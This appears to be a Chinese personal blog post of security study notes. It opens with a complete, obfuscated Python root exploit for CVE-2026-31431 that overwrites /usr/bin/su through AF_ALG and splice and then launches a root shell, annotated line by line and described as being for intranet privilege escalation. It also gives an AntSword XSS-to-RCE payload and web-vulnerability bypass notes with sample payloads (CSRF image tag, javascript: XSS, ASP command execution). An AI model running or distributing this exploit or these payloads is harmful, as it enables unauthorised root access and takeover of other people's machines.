牢大发的所有文章以及文章的关联内容我都将严肃逐字学习和复现

CVE-2026-31431

https://github.com/theori-io/copy-fail-CVE-2026-31431.git

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/usr/bin/env python3
import os as g,zlib,socket as s
#把 os 简写成 g,把 socket 简写成 s。这是混淆代码的常见写法,降低可读性。

def d(x):return bytes.fromhex(x)


#c函数
def c(f,t,c):
    
#38 通常对应 Linux 的 AF_ALG。它不是普通网络 socket,而是 Linux 内核加密接口 socket。
 a=s.socket(38,5,0);
 #绑定一个AEAD加密算法
a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));
    h=279;
    v=a.setsockopt;
    v(h,1,d('0800010000000010'+'0'*64));
    v(h,5,None,4);
    u,_=a.accept();
    o=t+4;i=d('00');
    u.sendmsg([b"A"*4+c],
              [(h,3,i*4),
               (h,2,b'\x10'+i*19),
               (h,4,b'\x08'+i*3),],
              32768);
    r,w=g.pipe();
    n=g.splice;
    n(f,w,o,offset_src=0);
    n(r,u.fileno(),o)
 try:
    u.recv(8+t)
 except:
    0



f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
# f=g.open("/usr/bin/su",0)以只读方式打开 /usr/bin/su
# e=zlib.decompress(d("78da..."))

# 会把一段十六进制字符串解压出来。解压后的内容是一个很小的 ELF 可执行文件。它的功能大致是:

# setuid(0);
# execve("/bin/sh", ...);
# exit();
#也就是说,它会尝试把当前进程用户 ID 设置为 root,然后启动 /bin/sh。如果这个 ELF 成功替换了 /usr/bin/su,再执行 su 时,就可能直接获得 root shell。

while i<len(e):c(f,i,e[i:i+4]);i+=4

#每次取解压后 ELF 文件的 4 个字节,调用 c() 函数写到 /usr/bin/su 的对应偏移位置。也就是说,它不是一次性写完整文件,而是分块覆盖。
g.system("su")

#最后触发点。它执行 /usr/bin/su。如果前面对 /usr/bin/su 的覆盖成功,那么执行的就不是原来的 su,而是前面写进去的恶意 ELF。结果可能是获得 root shell。

可以利用 AF_ALG 加密接口与 splice() 系统调用的组合,向任意可读文件的页缓存写入受控的4字节数据,从而篡改 setuid 程序,无需竞争条件即可直接获得 root 权限。

1
2
3
4
5
6
7
8
9
打开 /usr/bin/su

解压出一个 160 字节的 ELF 程序

每次写入 4 字节,尝试覆盖 /usr/bin/su 的内容

执行 su

如果覆盖成功,su 实际变成“提权后打开 /bin/sh”的程序

看不懂,老大说是内网提权用的

蚁剑xss+rce

- 漏洞来源:GitHub Issues #370
- 影响版本:AntSword v2.1.15
- 漏洞类型:XSS → RCE 任意代码执行

https://github.com/AntSwordProject/antSword/releases

antSword.noxss() 过滤不完整,仅对 5 个基础字符做转义,未覆盖 [ ] ! ; : 等 jquery.terminal 格式码字符。
恶意服务端可注入构造好的脚本链接,绕过过滤后在虚拟终端渲染为可点击链接。

由于蚁剑基于 Electron 开发,且开启了 nodeIntegration: true ,一旦点击链接,可直接调用 Node.js API,执行任意系统命令,完全接管用户主机。

攻击流程

攻击者部署恶意服务端,注入含 javascript: 协议的 Payload

1
[[!;;;;javascript:void(require(`child_process`).exec(`calc.exe`))]{http://localhost/phpmyadmin/}]

top10漏洞

敏感性息泄露,安全配置错误,缺少功能级的访问控制,失效的身份认证和会话管理,未验证的重定向,csrf,直接应用不安全的对象,sql,xss,已知漏洞的组件

首先信息搜集,目录扫描检测安全配置是否错误,是否敏感性息泄露,是否缺少功能级的访问控制(概率低,一般是根据抓包推测的),然后登录页面有没有弱密码(失效的身份认证和会话管理),看看有没有url跳转(未验证的重定向和转发),抓包看看csrf,直接应用不安全的对象,缺少功能级的访问控制,然后根据回显测一下sql,xss,最后没招了就搜搜套用的框架被爆出来那些漏洞

sql注入

分类

危害

防御

用户输入:过滤输入,限制长度

传输层:加waf替换转义

数据库:对drop/create/trucate谨慎赋权;加盐MD5

回显:关闭应用的报错

编程:预编译,套框架

绕过

形式

插入%

内联注释/*!select*/

二次编码

替换法

提交方式

multipart请求绕过(bp分块混淆)

复制参数绕过

组合法

比如and==>&&然后url编码

csrf

攻击者建立一个可以给目标网站发送恶意请求的网站页面,让携带cookie的浏览器点击恶意页面,触发恶意请求,完成恶意操作(应该是这样,没遇到过不是很理解)

攻击者操作

1
<ing src="https://bank.example.com/transfer?to=attacker&money=1000">

危害

防护

用户交互

加验证码

请求包

setCookie设置httpOnly,security,sameSite

检测referer或origin

加token

用post别用get

文件包含

类型

allow_url_include,allow_url_fopen开启后可执行任意代码

文件包含函数

include,require

利用

如果allow_url_include没开就本地读取敏感文件,读文件最好base64伪协议读取,如果开了就在自己服务器上写恶意代码远程包含shell,或者上传文件包含文件shell,没有上传点就试试日志包含,或者使用伪协议,有过滤就截断包含

防御

防写shell

allow_url_include=off

修改日志存放地址

防止任意文件读取

禁止…/

open_basedir=指定目录

magic_quotes_gpc=on(防止截断包含)

文件上传漏洞

绕过方法

黑名单

改后缀,上传htaccess,大小写,后缀名前加.,加::$DATA,或者x.php…

白名单

%00,图片马,条件竞争

防御

ssrf漏洞

利用方式

file协议读取文件

dict协议探测端口

gopher发送get,post请求,或者攻击内网ftp,redis,telnet,memchace,或者反弹shell

绕过

中间插外网域名@

ip省略写法绕过

dns重绑定

8 10 16进制绕过

逻辑漏洞

订单任意金额修改

验证码回传

预防

后端校验

或者前端加密校验

未进行登录凭证验证

某些业务接口缺乏对用户登陆凭证的校验或者校验存在缺陷,导致可以未授权访问或者越权

比如后台页面,id枚举

预防

对敏感数据存在的接口做cookie,ssid,token鉴权

接口无限制枚举

我直接把上一条的预防做了,这个不就也预防了吗

回答:这一条是防止撞库,因为未登录用户不可能先有token,所以场景的重点是防止攻击者无限尝试账号密码组合,比如攻击者用泄露的邮箱和密码字典不断请求login页面

我趣ai太好用了

预防

在输入接口设置验证

如果设置验证码,最好采取后端验证

如果设置token,最好设置时长

注册界面不要返回太多敏感信息

防止攻击者制作枚举字典

验证码用6位以上,最好数字加字母

优惠券,vip卡号尽量不要存在规律性和简短性

cookie设置存在缺陷

校验过于简单

cookie存在被盗风险

预防

cookie中设置多个参数配对

cookie数据加密采用严格的数据加密算法,并注意密钥管理

cookie生成过程中带入用户密码,这样一旦密码改变,cookie值也会随密码改变

cookie中设置session参数

xss漏洞

类型

存储反射dom

反射和dom的区别

绕过

大小写

js伪协议

<a href="javascript:alert(1)">点击</a>

没有分号

flash

html5新标签

fuzz进行测试

双层标签绕过

防御

对特定字符进行编码,比如<>

对重要的cookie设置httpOnly

防止document.cookie读取cookie

URLencode操作

不要使用eval解析输入,对于json解析时使用JSON.parse()

xxe

作用

内网端口扫描,file协议文件读取,攻击内网web服务

防御

php中开启libxml_disable_entity_loader

代码执行漏洞

php

eval assert

python

exec

asp

1
<%=CreateObject("wscript.shell").exec("cmd.exe /Cipconfig").StdOut.ReadAll%>

利用

执行代码的函数

callback函数:preg_replace + /e 函数

反序列化

防御

如有错误,多多指教

valine